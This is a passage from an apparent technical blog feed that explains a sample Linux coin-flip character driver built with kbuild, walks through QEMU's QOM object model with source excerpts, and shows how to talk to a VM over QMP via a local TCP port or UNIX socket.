<p>Since CONFIG_COIN is either y or m, coin.o lands on either the obj-y or the obj-m list, and the example is complete. The kbuild flow is summarized in the figure below; the driver code from the original article follows.</p>
<p><img src="/assets/img/kbuild/1.jpg" alt="" /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/fs.h>
#include <linux/uaccess.h>
#include <linux/device.h>
#include <linux/random.h>
#include <linux/debugfs.h>
#define DEVNAME "coin"
#define LEN 20
enum values {HEAD, TAIL};
struct dentry *dir, *file;
int file_value;
int stats[2] = {0, 0};
char *msg[2] = {"head\n", "tail\n"};
static int major;
static struct class *class_coin;
static struct device *dev_coin;
static ssize_t r_coin(struct file *f, char __user *b,
size_t cnt, loff_t *lf)
{
char *ret;
u32 value = prandom_u32() % 2;
ret = msg[value];
stats[value]++;
return simple_read_from_buffer(b, cnt,
lf, ret,
strlen(ret));
}
static struct file_operations fops = { .read = r_coin };
#ifdef CONFIG_COIN_STAT
static ssize_t r_stat(struct file *f, char __user *b,
size_t cnt, loff_t *lf)
{
char buf[LEN];
snprintf(buf, LEN, "head=%d tail=%d\n",
stats[HEAD], stats[TAIL]);
return simple_read_from_buffer(b, cnt,
lf, buf,
strlen(buf));
}
static struct file_operations fstat = { .read = r_stat };
#endif
int init_module(void)
{
void *ptr_err;
major = register_chrdev(0, DEVNAME, &fops);
if (major < 0)
return major;
class_coin = class_create(THIS_MODULE,
DEVNAME);
if (IS_ERR(class_coin)) {
ptr_err = class_coin;
goto err_class;
}
dev_coin = device_create(class_coin, NULL,
MKDEV(major, 0),
NULL, DEVNAME);
if (IS_ERR(dev_coin))
goto err_dev;
#ifdef CONFIG_COIN_STAT
dir = debugfs_create_dir("coin", NULL);
file = debugfs_create_file("stats", 0644,
dir, &file_value,
&fstat);
#endif
return 0;
err_dev:
ptr_err = class_coin;
class_destroy(class_coin);
err_class:
unregister_chrdev(major, DEVNAME);
return PTR_ERR(ptr_err);
}
void cleanup_module(void)
{
#ifdef CONFIG_COIN_STAT
debugfs_remove(file);
debugfs_remove(dir);
#endif
device_destroy(class_coin, MKDEV(major, 0));
class_destroy(class_coin);
return unregister_chrdev(major, DEVNAME);
}
MODULE_LICENSE("GPL");
</code></pre></div></div>
An introduction to QOM (2017-01-08) http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/01/08/qom-introduction
<ul>
<li><a href="#第一节">1. Module registration</a></li>
<li><a href="#第二节">2. Class initialization</a></li>
<li><a href="#第三节">3. The class hierarchy</a></li>
<li><a href="#第四节">4. Object construction</a></li>
<li><a href="#总结">5. Summary</a></li>
<li><a href="#后记">Postscript</a></li>
</ul>
<p>QOM stands for QEMU Object Model, and as the name suggests it is an abstraction layer over the objects in qemu. Through QOM, qemu's various resources can be abstracted and managed: the creation, configuration, and destruction of devices in device emulation, for instance. QOM is also used to abstract the various backends, MemoryRegion, Machine, and more; it is no exaggeration to say QOM is everywhere in the qemu code. This article uses device emulation as the running example for a detailed look at QOM. The code is based on qemu-2.8.</p>
<h2 id="第一节"> 1. Module registration </h2>
<p>In the device models under the hw directory, almost every .c file contains a global</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>type_init(xxxxxxxxx)
</code></pre></div></div>
<p>This registers the module with QOM, for example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>type_init(serial_register_types)//注册serial
type_init(vmxnet3_register_types)//注册vmxnet3
</code></pre></div></div>
<p>This resembles Linux driver module registration. Here type_init is a macro; in include/qemu/module.h we see:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define module_init(function, type) \
static void __attribute__((constructor)) do_qemu_init_ ## function(void) \
{ \
register_module_init(function, type); \
}
typedef enum {
MODULE_INIT_BLOCK,
MODULE_INIT_OPTS,
MODULE_INIT_QAPI,
MODULE_INIT_QOM,
MODULE_INIT_TRACE,
MODULE_INIT_MAX
} module_init_type;
#define block_init(function) module_init(function, MODULE_INIT_BLOCK)
#define opts_init(function) module_init(function, MODULE_INIT_OPTS)
#define qapi_init(function) module_init(function, MODULE_INIT_QAPI)
#define type_init(function) module_init(function, MODULE_INIT_QOM)
#define trace_init(function) module_init(function, MODULE_INIT_TRACE)
</code></pre></div></div>
<p>There are several module types; every xxx_init registers itself by calling module_init.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void register_module_init(void (*fn)(void), module_init_type type)
{
ModuleEntry *e;
ModuleTypeList *l;
e = g_malloc0(sizeof(*e));
e->init = fn;
e->type = type;
l = find_type(type);
QTAILQ_INSERT_TAIL(l, e, node);
}
static ModuleTypeList *find_type(module_init_type type)
{
init_lists();
return &init_type_list[type];
}
static ModuleTypeList init_type_list[MODULE_INIT_MAX];
</code></pre></div></div>
<p>Now it is fairly clear: init_type_list is a global array of lists, and every object registered with type_init gets linked onto init_type_list[MODULE_INIT_QOM]. The process is illustrated below.</p>
<p>Note the definition of module_init:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define module_init(function, type) \
static void __attribute__((constructor)) do_qemu_init_ ## function(void) \
{ \
register_module_init(function, type); \
}
</code></pre></div></div>
<p>so every type_init expands into a function do_qemu_init_xxxx; type_init(serial_register_types), for example, expands to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>staic void __attribute__((constructor)) do_qemu_init_serial_register_types()
{
register_module_init(serial_register_types, MODULE_INIT_QOM)
}
</code></pre></div></div>
<p>Given the constructor attribute, this function runs before main.</p>
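<p>The effect of the constructor attribute is easy to demonstrate with a minimal standalone C program (a GCC/Clang feature demo, unrelated to the QEMU code itself): the function runs before main, exactly as every generated do_qemu_init_xxx registration helper does.</p>

```c
#include <assert.h>

static int registered = 0;

/* Runs before main(), like QEMU's generated do_qemu_init_<fn> helpers. */
static void __attribute__((constructor)) fake_register_module(void)
{
    registered = 1;
}
```

<p>Any code running inside main observes registered == 1 without fake_register_module ever being called explicitly.</p>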
<p>So by the time qemu's main starts executing, the lists of figure 1 are already in place. Early in main we find the call:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>module_call_init(MODULE_INIT_QOM);
</code></pre></div></div>
<p>Looking at the definition of module_call_init:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void module_call_init(module_init_type type)
{
ModuleTypeList *l;
ModuleEntry *e;
l = find_type(type);
QTAILQ_FOREACH(e, l, node) {
e->init();
}
}
</code></pre></div></div>
<p>we see it simply invokes the init functions registered on the list. Taking serial as the example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void serial_register_types(void)
{
type_register_static(&serial_isa_info);
}
type_init(serial_register_types)
</code></pre></div></div>
<p>Here serial_register_types is called, which passes serial_isa_info to type_register_static. The call chain is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>type_register_static->type_register->type_register_internal->type_new
</code></pre></div></div>
<p>The purpose of this chain is to construct a TypeImpl from the TypeInfo and insert it into a hash table, keyed by ti->name (that is, info->name), with the TypeImpl generated from the TypeInfo as the value. After module_call_init(MODULE_INIT_QOM) returns, this hash table holds all the type information.</p>
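<p>The outcome of this phase can be modeled with a toy name-keyed table in standalone C (QEMU actually uses a GLib hash table and a much richer TypeImpl; the type names and fields below are purely illustrative):</p>

```c
#include <assert.h>
#include <string.h>

#define MAX_TYPES 16

/* Toy stand-in for QEMU's TypeImpl and its name-keyed table. */
struct type_impl { const char *name; const char *parent; };

static struct type_impl type_table[MAX_TYPES];
static int num_types;

/* Model of type registration: store the entry under its name. */
static void model_type_register(const char *name, const char *parent)
{
    type_table[num_types].name = name;
    type_table[num_types].parent = parent;
    num_types++;
}

/* Model of type_get_by_name(): linear lookup instead of hashing. */
static struct type_impl *model_type_get_by_name(const char *name)
{
    int i;

    for (i = 0; i < num_types; i++)
        if (strcmp(type_table[i].name, name) == 0)
            return &type_table[i];
    return 0;
}
```

<p>Registering a couple of entries and looking them up by name mirrors how later phases walk from a type to its parent.</p>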
<h2 id="第二节">2. Class initialization </h2>
<p>From part one we know there is now a hash table of TypeImpl. The next step is to initialize each type; this can be viewed as class initialization, with each type corresponding to a class. The call chain is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>main->select_machine->find_default_machine->object_class_get_list->object_class_foreach
</code></pre></div></div>
<p>That is, the types are initialized as a side effect of selecting the machine type.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void object_class_foreach(void (*fn)(ObjectClass *klass, void *opaque),
const char *implements_type, bool include_abstract,
void *opaque)
{
OCFData data = { fn, implements_type, include_abstract, opaque };
enumerating_types = true;
g_hash_table_foreach(type_table_get(), object_class_foreach_tramp, &data);
enumerating_types = false;
}
</code></pre></div></div>
<p>type_table_get returns the hash table built earlier, keyed by name with TypeImpl values. Now look at the function applied to each entry of the table:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void object_class_foreach_tramp(gpointer key, gpointer value,
gpointer opaque)
{
OCFData *data = opaque;
TypeImpl *type = value;
ObjectClass *k;
type_initialize(type);
k = type->class;
if (!data->include_abstract && type->abstract) {
return;
}
if (data->implements_type &&
!object_class_dynamic_cast(k, data->implements_type)) {
return;
}
data->fn(k, data->opaque);
}
</code></pre></div></div>
<p>Let us look at the type_initialize function:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void type_initialize(TypeImpl *ti)
{
TypeImpl *parent;
if (ti->class) {
return;
}
ti->class_size = type_class_get_size(ti);
ti->instance_size = type_object_get_size(ti);
ti->class = g_malloc0(ti->class_size);
parent = type_get_parent(ti);
if (parent) {
type_initialize(parent);
GSList *e;
int i;
g_assert_cmpint(parent->class_size, <=, ti->class_size);
memcpy(ti->class, parent->class, parent->class_size);
ti->class->interfaces = NULL;
ti->class->properties = g_hash_table_new_full(
g_str_hash, g_str_equal, g_free, object_property_free);
for (e = parent->class->interfaces; e; e = e->next) {
InterfaceClass *iface = e->data;
ObjectClass *klass = OBJECT_CLASS(iface);
type_initialize_interface(ti, iface->interface_type, klass->type);
}
for (i = 0; i < ti->num_interfaces; i++) {
TypeImpl *t = type_get_by_name(ti->interfaces[i].typename);
for (e = ti->class->interfaces; e; e = e->next) {
TypeImpl *target_type = OBJECT_CLASS(e->data)->type;
if (type_is_ancestor(target_type, t)) {
break;
}
}
if (e) {
continue;
}
type_initialize_interface(ti, t, t);
}
} else {
ti->class->properties = g_hash_table_new_full(
g_str_hash, g_str_equal, g_free, object_property_free);
}
ti->class->type = ti;
while (parent) {
if (parent->class_base_init) {
parent->class_base_init(ti->class, ti->class_data);
}
parent = type_get_parent(parent);
}
if (ti->class_init) {
ti->class_init(ti->class, ti->class_data);
}
}
</code></pre></div></div>
<p>At the start we can see that if ti->class already exists, the type has been initialized and we return immediately. Further down, if the type has a parent, type_initialize is called recursively, i.e. the parent type's initialization runs first.</p>
<p>So types also form a hierarchy, namely the QOM object hierarchy. In the definition of the serial_isa_info structure we can see a .parent field:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const TypeInfo serial_isa_info = {
.name = TYPE_ISA_SERIAL,
.parent = TYPE_ISA_DEVICE,
.instance_size = sizeof(ISASerialState),
.class_init = serial_isa_class_initfn,
};
</code></pre></div></div>
<p>This tells us that the parent type of TYPE_ISA_SERIAL is TYPE_ISA_DEVICE. In hw/isa/isa-bus.c we can see that the parent type of isa_device_type_info is TYPE_DEVICE:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const TypeInfo isa_device_type_info = {
.name = TYPE_ISA_DEVICE,
.parent = TYPE_DEVICE,
.instance_size = sizeof(ISADevice),
.instance_init = isa_device_init,
.abstract = true,
.class_size = sizeof(ISADeviceClass),
.class_init = isa_device_class_init,
};
</code></pre></div></div>
<p>Tracing upwards in this way, we obtain the following chain of types:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TYPE_ISA_SERIAL->TYPE_ISA_DEVICE->TYPE_DEVICE->TYPE_OBJECT
</code></pre></div></div>
<p>In fact, QEMU has two root types; the other one is TYPE_INTERFACE.</p>
<p>This shows that the order in which individual types are initialized does not matter: whichever type is initialized first, the recursion always reaches the object type in the end. For object itself, initialization simply allocates ti->class and sets ti->class->type. If a type has interfaces, ti->class->interfaces is initialized as well; each interface is itself a type. If the parent type has interfaces, those are also added to ti->class->interfaces.</p>
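<p>The ordering guarantee described above, where the parent is initialized first and its class data is copied into the child (the C code does this with memcpy) before the child's class_init runs, can be modelled in a few lines. This is a sketch with made-up names, not QEMU's implementation:</p>

```python
# Sketch of type_initialize()'s ordering: build a type's class by first
# initializing its parent recursively, then copying the parent's class
# fields into the child's class, then running the type's own class_init.
classes = {}  # name -> class dict, mirrors ti->class

types = {
    "object": {"parent": None, "class_init": lambda c: c.update(kind="object")},
    "device": {"parent": "object", "class_init": lambda c: c.update(realize="dev")},
}

def type_initialize(name):
    if name in classes:                 # ti->class already set: nothing to do
        return classes[name]
    ti = types[name]
    cls = {}
    if ti["parent"]:
        cls.update(type_initialize(ti["parent"]))  # the "memcpy" of the parent class
    ti["class_init"](cls)
    classes[name] = cls
    return cls

assert type_initialize("device") == {"kind": "object", "realize": "dev"}
```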
<p>After that, the most important steps are the calls to parent->class_base_init and ti->class_init, which are analogous to constructing the base-class data in C++. Let's take one class_init as an example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void serial_isa_class_initfn(ObjectClass *klass, void *data)
{
DeviceClass *dc = DEVICE_CLASS(klass);
dc->realize = serial_isa_realizefn;
dc->vmsd = &vmstate_isa_serial;
dc->props = serial_isa_properties;
set_bit(DEVICE_CATEGORY_INPUT, dc->categories);
}
</code></pre></div></div>
<p>We can see that the ObjectClass is cast to a DeviceClass here, after which some bookkeeping is done. Why is this cast valid? To answer that, let's look at the class hierarchy.</p>
<h2 id="第三节">3. The Class Hierarchy</h2>
<p>vmxnet3 has a few more levels than most devices, so let's use it as the example. First, the definition of vmxnet3_info:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const TypeInfo vmxnet3_info = {
.name = TYPE_VMXNET3,
.parent = TYPE_PCI_DEVICE,
.class_size = sizeof(VMXNET3Class),
.instance_size = sizeof(VMXNET3State),
.class_init = vmxnet3_class_init,
.instance_init = vmxnet3_instance_init,
};
typedef struct VMXNET3Class {
PCIDeviceClass parent_class;
DeviceRealize parent_dc_realize;
} VMXNET3Class;
typedef struct PCIDeviceClass {
DeviceClass parent_class;
void (*realize)(PCIDevice *dev, Error **errp);
int (*init)(PCIDevice *dev);/* TODO convert to realize() and remove */
PCIUnregisterFunc *exit;
PCIConfigReadFunc *config_read;
PCIConfigWriteFunc *config_write;
...
} PCIDeviceClass;
typedef struct DeviceClass {
/*< private >*/
ObjectClass parent_class;
/*< public >*/
...
} DeviceClass;
struct ObjectClass
{
/*< private >*/
Type type;
GSList *interfaces;
const char *object_cast_cache[OBJECT_CLASS_CAST_CACHE];
const char *class_cast_cache[OBJECT_CLASS_CAST_CACHE];
ObjectUnparent *unparent;
GHashTable *properties;
};
</code></pre></div></div>
<p>We can see the following hierarchy:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>VMXNET3Class->PCIDeviceClass->DeviceClass->ObjectClass
</code></pre></div></div>
<p>This can be regarded as inheritance in the C++ sense: ObjectClass is the base class, and each level further down carries more concrete data.</p>
<p>From type_initialize we can see the call class_init(ti->class, ti->class_data), where ti->class was just allocated; for vmxnet3 it is a VMXNET3Class structure. Note the line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>memcpy(ti->class, parent->class, parent->class_size);
</code></pre></div></div>
<p>So by this point all of VMXNET3Class's parent classes have already been initialized. Therefore, once inside vmxnet3_class_init, calling DEVICE_CLASS, PCI_DEVICE_CLASS or VMXNET3_DEVICE_CLASS yields the corresponding base class, similar to a derived-to-base conversion in C++. Take this line as an example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PCIDeviceClass *c = PCI_DEVICE_CLASS(class);
</code></pre></div></div>
<p>Here class is the class corresponding to vmxnet3, i.e. class->type->name == "vmxnet3".</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define PCI_DEVICE_CLASS(klass) \
OBJECT_CLASS_CHECK(PCIDeviceClass, (klass), TYPE_PCI_DEVICE)
#define OBJECT_CLASS_CHECK(class_type, class, name) \
((class_type *)object_class_dynamic_cast_assert(OBJECT_CLASS(class), (name), \
__FILE__, __LINE__, __func__))
ObjectClass *object_class_dynamic_cast_assert(ObjectClass *class,
const char *typename,
const char *file, int line,
const char *func)
{
ObjectClass *ret;
...
ret = object_class_dynamic_cast(class, typename);
...
return ret;
}
ObjectClass *object_class_dynamic_cast(ObjectClass *class,
const char *typename)
{
ObjectClass *ret = NULL;
TypeImpl *target_type;
TypeImpl *type;
if (!class) {
return NULL;
}
/* A simple fast path that can trigger a lot for leaf classes. */
type = class->type;
if (type->name == typename) {
return class;
}
target_type = type_get_by_name(typename);
if (!target_type) {
/* target class type unknown, so fail the cast */
return NULL;
}
if (type->class->interfaces &&
...
} else if (type_is_ancestor(type, target_type)) {
ret = class;
}
return ret;
}
static bool type_is_ancestor(TypeImpl *type, TypeImpl *target_type)
{
assert(target_type);
/* Check if target_type is a direct ancestor of type */
while (type) {
if (type == target_type) {
return true;
}
type = type_get_parent(type);
}
return false;
}
</code></pre></div></div>
<p>Eventually we reach object_class_dynamic_cast, which decides, based on the type of class and the type named by typename, whether the cast is allowed. The main criterion is type_is_ancestor: if target_type is an ancestor of type, the cast is permitted; otherwise it fails.</p>
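<p>The ancestor walk at the heart of the cast check is easy to model. A minimal Python sketch (hypothetical type names) mirroring the logic of type_is_ancestor:</p>

```python
# Sketch of type_is_ancestor(): a cast succeeds iff the target type is the
# class's own type or one of its ancestors, found by walking parent links.
parents = {
    "vmxnet3": "pci-device",
    "pci-device": "device",
    "device": "object",
    "object": None,
}

def type_is_ancestor(type_name, target):
    while type_name is not None:
        if type_name == target:
            return True
        type_name = parents[type_name]
    return False

assert type_is_ancestor("vmxnet3", "pci-device")   # upcast allowed
assert not type_is_ancestor("device", "vmxnet3")   # downcast to unrelated leaf fails
```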
<p>To sum up what we have so far: starting from the TypeImpl table, we have initialized the class of every type and established the inheritance relationships between the classes, as shown in the figure below. Note that each ***Class embeds a copy of the one above it.</p>
<p><img src="/assets/img/qom/2.png" alt="" /></p>
<h2 id="第四节">4. Object Construction</h2>
<p>We have seen how the type hash table is built and how classes are initialized; next we discuss the creation of concrete devices.</p>
<p>Taking vmxnet3 as an example, we specify -device vmxnet3 on the command line. In main there is the following code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (qemu_opts_foreach(qemu_find_opts("device"),
device_init_func, NULL, NULL)) {
exit(1);
}
</code></pre></div></div>
<p>device_init_func is called for every device given on the command line; the call chain is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>device_init_func->qdev_device_add
</code></pre></div></div>
<p>In qdev_device_add we find this line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> dev = DEVICE(object_new(driver));
DeviceState *qdev_device_add(QemuOpts *opts, Error **errp)
{
DeviceClass *dc;
const char *driver, *path;
DeviceState *dev;
BusState *bus = NULL;
Error *err = NULL;
driver = qemu_opt_get(opts, "driver");
if (!driver) {
error_setg(errp, QERR_MISSING_PARAMETER, "driver");
return NULL;
}
/* find driver */
dc = qdev_get_device_class(&driver, errp);
if (!dc) {
return NULL;
}
/* find bus */
path = qemu_opt_get(opts, "bus");
if (path != NULL) {
bus = qbus_find(path, errp);
if (!bus) {
return NULL;
}
if (!object_dynamic_cast(OBJECT(bus), dc->bus_type)) {
error_setg(errp, "Device '%s' can't go on %s bus",
driver, object_get_typename(OBJECT(bus)));
return NULL;
}
} else if (dc->bus_type != NULL) {
bus = qbus_find_recursive(sysbus_get_default(), NULL, dc->bus_type);
if (!bus || qbus_is_full(bus)) {
error_setg(errp, "No '%s' bus found for device '%s'",
dc->bus_type, driver);
return NULL;
}
}
if (qdev_hotplug && bus && !qbus_is_hotpluggable(bus)) {
error_setg(errp, QERR_BUS_NO_HOTPLUG, bus->name);
return NULL;
}
/* create device */
dev = DEVICE(object_new(driver));
if (bus) {
qdev_set_parent_bus(dev, bus);
}
qdev_set_id(dev, qemu_opts_id(opts));
/* set properties */
if (qemu_opt_foreach(opts, set_property, dev, &err)) {
error_propagate(errp, err);
object_unparent(OBJECT(dev));
object_unref(OBJECT(dev));
return NULL;
}
dev->opts = opts;
object_property_set_bool(OBJECT(dev), true, "realized", &err);
if (err != NULL) {
error_propagate(errp, err);
dev->opts = NULL;
object_unparent(OBJECT(dev));
object_unref(OBJECT(dev));
return NULL;
}
return dev;
}
</code></pre></div></div>
<p>The object is created via object_new(driver), where driver is the device name, vmxnet3:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>object_new->object_new_with_type->object_initialize_with_type
Object *object_new_with_type(Type type)
{
Object *obj;
g_assert(type != NULL);
type_initialize(type);
obj = g_malloc(type->instance_size);
object_initialize_with_type(obj, type->instance_size, type);
obj->free = g_free;
return obj;
}
static void object_init_with_type(Object *obj, TypeImpl *ti)
{
if (type_has_parent(ti)) {
object_init_with_type(obj, type_get_parent(ti));
}
if (ti->instance_init) {
ti->instance_init(obj);
}
}
</code></pre></div></div>
<p>As the code above shows, each object's parent objects are initialized recursively before its own instance_init function is called. Object inheritance is involved here as well:</p>
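<p>The key point is the initialization order: the root type's instance_init hook runs first, then each descendant's, down to the concrete type. A minimal Python sketch of that recursion (the type names and hooks are illustrative, not QEMU's):</p>

```python
# Sketch of object_init_with_type(): parents' instance_init hooks run
# first, from the root type down to the concrete type.
calls = []
types = {
    "object":  {"parent": None,     "instance_init": lambda obj: calls.append("object")},
    "device":  {"parent": "object", "instance_init": lambda obj: calls.append("device")},
    "vmxnet3": {"parent": "device", "instance_init": lambda obj: calls.append("vmxnet3")},
}

def object_init_with_type(obj, name):
    ti = types[name]
    if ti["parent"]:
        object_init_with_type(obj, ti["parent"])  # initialize ancestors first
    ti["instance_init"](obj)

object_init_with_type({}, "vmxnet3")
assert calls == ["object", "device", "vmxnet3"]
```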
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct {
PCIDevice parent_obj;
...
} VMXNET3State;
struct PCIDevice {
DeviceState qdev;
...
};
struct DeviceState {
/*< private >*/
Object parent_obj;
/*< public >*/
};
struct Object
{
/*< private >*/
ObjectClass *class;
ObjectFree *free;
GHashTable *properties;
uint32_t ref;
Object *parent;
};
</code></pre></div></div>
<p>This time the inheritance chain is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>VMXNET3State->PCIDevice->DeviceState->Object
</code></pre></div></div>
<p>This creates a DeviceState, which is of course really a VMXNET3State, and the instance_init functions of all parent objects have already run. Let's see what the init functions at the object and device levels actually do:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void object_instance_init(Object *obj)
{
object_property_add_str(obj, "type", qdev_get_type, NULL, NULL);
}
static void device_initfn(Object *obj)
{
DeviceState *dev = DEVICE(obj);
ObjectClass *class;
Property *prop;
if (qdev_hotplug) {
dev->hotplugged = 1;
qdev_hot_added = true;
}
dev->instance_id_alias = -1;
dev->realized = false;
object_property_add_bool(obj, "realized",
device_get_realized, device_set_realized, NULL);
object_property_add_bool(obj, "hotpluggable",
device_get_hotpluggable, NULL, NULL);
object_property_add_bool(obj, "hotplugged",
device_get_hotplugged, device_set_hotplugged,
&error_abort);
class = object_get_class(OBJECT(dev));
do {
for (prop = DEVICE_CLASS(class)->props; prop && prop->name; prop++) {
qdev_property_add_legacy(dev, prop, &error_abort);
qdev_property_add_static(dev, prop, &error_abort);
}
class = object_class_get_parent(class);
} while (class != object_class_by_name(TYPE_DEVICE));
object_property_add_link(OBJECT(dev), "parent_bus", TYPE_BUS,
(Object **)&dev->parent_bus, NULL, 0,
&error_abort);
QLIST_INIT(&dev->gpios);
}
</code></pre></div></div>
<p>As we can see, these mainly add properties to the object: the type property on object, and the realized, hotpluggable and similar properties on device. Note that device_initfn also adds properties based on class->props; in vmxnet3_class_init we can see that when the class is initialized it is assigned vmxnet3_properties:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static Property vmxnet3_properties[] = {
DEFINE_NIC_PROPERTIES(VMXNET3State, conf),
DEFINE_PROP_BIT("x-old-msi-offsets", VMXNET3State, compat_flags,
VMXNET3_COMPAT_FLAG_OLD_MSI_OFFSETS_BIT, false),
DEFINE_PROP_BIT("x-disable-pcie", VMXNET3State, compat_flags,
VMXNET3_COMPAT_FLAG_DISABLE_PCIE_BIT, false),
DEFINE_PROP_END_OF_LIST(),
};
</code></pre></div></div>
<p>So after object_new, the newly created object already carries many properties, inherited from its parent objects.</p>
<p>Continuing with qdev_device_add, it calls object_property_set_bool:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>object_property_set_bool->object_property_set_qobject->object_property_set->property_set_bool->device_set_realized->vmxnet3_realize
</code></pre></div></div>
<p>Finally our vmxnet3_realize function is called, which completes the construction of the object. Unlike types and classes, objects are created on demand: an object is created only when a device is specified on the command line or hot-plugged. A class and its objects are linked through the class field of Object, as shown in the figure below.</p>
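<p>The realize-via-property chain can be sketched as follows. This is a toy model, not QEMU's property system: setting the "realized" property runs a setter that invokes the class's realize hook exactly once, in the spirit of device_set_realized calling vmxnet3_realize:</p>

```python
# Toy model of the "realized" property: the property setter, not the caller,
# is what triggers the device's realize hook.
class Device:
    def __init__(self, realize_fn):
        self._realized = False
        self._realize = realize_fn     # stands in for e.g. vmxnet3_realize()

    def set_property(self, name, value):
        if name == "realized" and value and not self._realized:
            self._realize(self)
            self._realized = True

log = []
dev = Device(lambda d: log.append("realized"))
dev.set_property("realized", True)
dev.set_property("realized", True)     # second set is a no-op
assert log == ["realized"] and dev._realized
```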
<p><img src="/assets/img/qom/3.png" alt="" /></p>
<h2 id="第五节">5. Summary</h2>
<p>As described above, I divide QOM object construction into three parts. The first is type construction, which builds a hash table of TypeImpl from TypeInfo and happens before main. The second is class construction, which happens inside main. Both of these are global: they run for every QOM object compiled into the binary. The third is object construction, which creates concrete object instances; an object is created only when the corresponding device is specified on the command line. As Paolo Bonzini put it, QEMU's polymorphism on the object side is class based, while properties are constructed dynamically, so each instance may have different properties, which is a prototype-based kind of polymorphism.</p>
<p>This article has focused on how objects come into being; interfaces and properties were not covered in depth. Maybe I will get a chance to describe them in detail later.</p>
<h2 id="后记">Postscript</h2>
<p>I meant to write this article a long, long time ago, back in 2015 when I was still at school. This year I have been busy hunting bugs and kept putting it off until now, when I finally filled in this gap. Shame on me; I have plenty more QEMU material prepared and hope to find the time to write it all up.</p>
<h2>References</h2>
<ol>
<li><a href="http://mnstory.net/2014/10/qemu-device-simulation/">QEMU Device Emulation (in Chinese)</a></li>
<li>QOM exegesis and apocalypse, Paolo Bonzini, KVM Forum 2014</li>
</ol>
QMP Introduction 2016-07-22T00:00:00+00:00 http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2016/07/22/qmp-introduction
<p>QMP is a JSON-based protocol for interacting with a virtual machine, for example to query the VM's internal state or to hot-plug and hot-unplug devices.</p>
<p>There are several ways to use QMP; here we briefly cover using it over TCP and over a UNIX socket.</p>
<h3>Using QMP over TCP</h3>
<p>Add the QMP parameters with -qmp:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./qemu-system-x86_64 -m 2048 -hda /root/centos6.img -enable-kvm -qmp tcp:localhost:1234,server,nowait
</code></pre></div></div>
<p>Connect to localhost:1234 with telnet:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>telnet localhost 1234
</code></pre></div></div>
<p>After that you can interact with the VM using QMP commands:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost ~]# telnet localhost 1234
Trying ::1...
Connected to localhost.
Escape character is '^]'.
{"QMP": {"version": {"qemu": {"micro": 0, "minor": 6, "major": 2}, "package": ""}, "capabilities": []}}
{ "execute": "qmp_capabilities" }
{"return": {}}
{ "execute": "query-status" }
{"return": {"status": "running", "singlestep": false, "running": true}}
</code></pre></div></div>
<h3>Using QMP over a UNIX socket</h3>
<p>Create the QMP channel on a UNIX socket:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./qemu-system-x86_64 -m 2048 -hda /root/centos6.img -enable-kvm -qmp unix:/tmp/qmp-test,server,nowait
</code></pre></div></div>
<p>Connect to the socket with nc:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc -U /tmp/qmp-test
</code></pre></div></div>
<p>From there on everything works the same way:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost qmp]# nc -U /tmp/qmp-test
{"QMP": {"version": {"qemu": {"micro": 0, "minor": 6, "major": 2}, "package": ""}, "capabilities": []}}
{ "execute": "qmp_capabilities" }
{"return": {}}
{ "execute": "query-status" }
{"return": {"status": "running", "singlestep": false, "running": true}}
</code></pre></div></div>
<p>The detailed QMP command format can be found in qmp-commands.hx in the top-level directory of the QEMU source tree.</p>
